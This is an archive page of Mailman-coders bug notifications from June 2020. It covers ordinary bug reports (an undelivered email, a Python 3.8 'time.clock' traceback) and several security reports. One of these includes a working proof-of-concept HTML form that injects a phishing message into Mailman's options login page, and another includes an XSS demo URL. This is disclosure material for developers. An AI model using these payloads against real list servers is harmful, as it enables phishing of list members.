Mailman 3 June 2020 - Mailman-coders

[Bug 1885172] [NEW] Administrator email not delivered
by Cristina Hanson June 25, 2020

June 25, 2020

Public bug reported: We are using GNU Mailman version 2.1.18-1. This morning one of our administrators posted to our listserve as normal, but it was not received. In the archives, it is showing as delivered. We have not had any issues like this before. Suggestions on how to ensure that our emails are being posted? ** Affects: mailman Importance: Undecided Status: New -- You received this bug notification because you are a member of Mailman Coders, which is subscribed to GNU Mailman. https://bugs.launchpad.net/bugs/1885172 Title: Administrator email not delivered To manage notifications about this bug go to: https://bugs.launchpad.net/mailman/+bug/1885172/+subscriptions

2 4

[Bug 1877379] [NEW] Arbitrary Content Injection via the private archive login page.
by Mark Sapiro June 25, 2020

June 25, 2020

Public bug reported: This is essentially the same as https://bugs.launchpad.net/mailman/+bug/1873722 except the vector is the private archive login page and the attack only succeeds if the list's roster visibility (private_roster) setting is 'Anyone'. This is fixed by the attached patch. ** Affects: mailman Importance: Low Assignee: Mark Sapiro (msapiro) Status: In Progress ** Patch added: "Patch to fix this issue" https://bugs.launchpad.net/bugs/1877379/+attachment/5367829/+files/private.… -- You received this bug notification because you are a member of Mailman Coders, which is subscribed to GNU Mailman. https://bugs.launchpad.net/bugs/1877379 Title: Arbitrary Content Injection via the private archive login page. To manage notifications about this bug go to: https://bugs.launchpad.net/mailman/+bug/1877379/+subscriptions

3 3

[Bug 1884752] [NEW] Brute forcing to match the admin list at www.example.com//mailman/edithtml/tests/listinfo.html?html_code=XSS%20demo
by Kamran Hasan June 23, 2020

June 23, 2020

*** This bug is a security vulnerability *** Private security bug reported: The brute forcing technique can be implemented to surpass the error message stating no such list tests. Such a address can exploit users data: www.example.com//mailman/edithtml/tests/listinfo.html?html_code=XSS%20demo ** Affects: mailman Importance: Undecided Status: New -- You received this bug notification because you are a member of Mailman Coders, which is subscribed to GNU Mailman. https://bugs.launchpad.net/bugs/1884752 Title: Brute forcing to match the admin list at www.example.com//mailman/edithtml/tests/listinfo.html?html_code=XSS%20demo To manage notifications about this bug go to: https://bugs.launchpad.net/mailman/+bug/1884752/+subscriptions

2 4

[Bug 1873722] [NEW] Arbitrary Content Injection via the options login page.
by Mark Sapiro June 23, 2020

June 23, 2020

*** This bug is a security vulnerability *** Private security bug reported: An issue similar to CVE - https://www.cvedetails.com/cve/CVE-2018-13796/ exists at different endpoint & param. It can lead to a phishing attack. Steps To Reproduce: 1. Copy and save the following HTML code and open it in any browser. Code: <html> <body> <script>history.pushState('', '', '/')</script> <form action="https://example.com/mailman/options/mailman" method="POST"> <input type="hidden" name="email" value="Your account has been hacked. Kindly go to https://badsite.com or share your credentials at attacker@badsite.com" /> <input type="hidden" name="UserOptions" value="Unsubscribe or edit options" /> <input type="hidden" name="language" value="en" /> <input type="submit" value="Submit request" /> </form> </body> </html> 2. Can be seen there- "Your account has been hacked. Kindly go to https://badsite.com or share your credentials at attacker(a)badsite.com" message will be displayed on the screen. ** Affects: mailman Importance: Medium Assignee: Mark Sapiro (msapiro) Status: Confirmed -- You received this bug notification because you are a member of Mailman Coders, which is subscribed to GNU Mailman. https://bugs.launchpad.net/bugs/1873722 Title: Arbitrary Content Injection via the options login page. To manage notifications about this bug go to: https://bugs.launchpad.net/mailman/+bug/1873722/+subscriptions

3 5

[Bug 1882660] [NEW] Mailman and Python 3.8 incompatibility - unable to subscribe a list
by František Kučera June 9, 2020

June 9, 2020

Public bug reported: In Ubuntu 20.04 LTS, it seems that Mailman3 package (3.2.2-1) is incompatible with Python 3.8 which is used in 20.04. How to reproduce: try to subscribe a list through the web interface https://.../mailman3/postorius/lists/.../ it returns an error and in /var/log/mailman3/mailman.log you will find: Jun 08 17:35:57 2020 (6830) Uncaught runner exception: module 'time' has no attribute 'clock' Jun 08 17:35:58 2020 (6830) Traceback (most recent call last): File "/usr/lib/python3/dist-packages/mailman/core/runner.py", line 173, in _one_iteration self._process_one_file(msg, msgdata) File "/usr/lib/python3/dist-packages/mailman/core/runner.py", line 266, in _process_one_file keepqueued = self._dispose(mlist, msg, msgdata) File "/usr/lib/python3/dist-packages/mailman/runners/incoming.py", line 79, in _dispose process(mlist, msg, msgdata, start_chain) File "/usr/lib/python3/dist-packages/mailman/core/chains.py", line 79, in process link.function(mlist, msg, msgdata) File "/usr/lib/python3/dist-packages/mailman/chains/hold.py", line 147, in _process request_id = hold_message(mlist, msg, msgdata, SEMISPACE.join(reasons)) File "/usr/lib/python3/dist-packages/mailman/app/moderator.py", line 88, in hold_message request_id = requestsdb.hold_request( File "/usr/lib/python3/dist-packages/mailman/database/transaction.py", line 85, in wrapper return function(args[0], config.db.store, *args[1:], **kws) File "/usr/lib/python3/dist-packages/mailman/model/requests.py", line 100, in hold_request token = getUtility(IPendings).add(pendable, timedelta(days=5000)) File "/usr/lib/python3/dist-packages/mailman/database/transaction.py", line 85, in wrapper return function(args[0], config.db.store, *args[1:], **kws) File "/usr/lib/python3/dist-packages/mailman/model/pending.py", line 91, in add token = token_factory.new() File "/usr/lib/python3/dist-packages/mailman/utilities/uid.py", line 79, in new return self._next_unpredictable_id() File "/usr/lib/python3/dist-packages/mailman/utilities/uid.py", line 155, in _next_unpredictable_id x = random.random() + right_now % 1.0 + time.clock() % 1.0 AttributeError: module 'time' has no attribute 'clock' This bug has been already fixed in upstream: https://gitlab.com/mailman/mailman/-/commit/ea05bdd0f74ba06d85adad1f7d190a6… Workaround: patch the files /usr/lib/python3/dist-packages/mailman/ by hand and restart mailman. ** Affects: mailman Importance: Undecided Status: New ** Affects: mailman3 (Ubuntu) Importance: Undecided Status: New ** Tags: mailman3 ** Also affects: mailman3 (Ubuntu) Importance: Undecided Status: New -- You received this bug notification because you are a member of Mailman Coders, which is subscribed to GNU Mailman. https://bugs.launchpad.net/bugs/1882660 Title: Mailman and Python 3.8 incompatibility - unable to subscribe a list To manage notifications about this bug go to: https://bugs.launchpad.net/mailman/+bug/1882660/+subscriptions

3 2